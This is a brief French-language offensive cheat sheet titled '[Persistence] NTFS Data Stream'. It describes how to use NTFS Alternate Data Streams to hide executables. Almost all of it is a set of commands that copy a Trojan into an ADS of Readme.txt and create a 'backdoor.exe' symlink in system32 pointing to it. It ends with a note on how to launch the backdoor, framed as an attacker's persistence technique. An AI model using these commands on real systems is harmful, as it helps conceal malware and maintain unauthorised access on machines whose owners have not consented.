[Persistence] NTFS Data Stream
Introduction
Les Alternate Data Streams, ou ADS, permettent de cacher des fichiers dans des fichiers sur des systèmes de fichiers NTFS.
Manuel
type Trojan.exe > c:\Readme.txt:Trojan.exe
Pour créer un lien dans le fichier Readme.txt vers le Trojan :
cd c:\Windows\system32
mklink backdoor.exe Readme.txt:Trojan.exe
Vous devriez pouvoir lancer votre backdoor de la manière suivante :
backdoor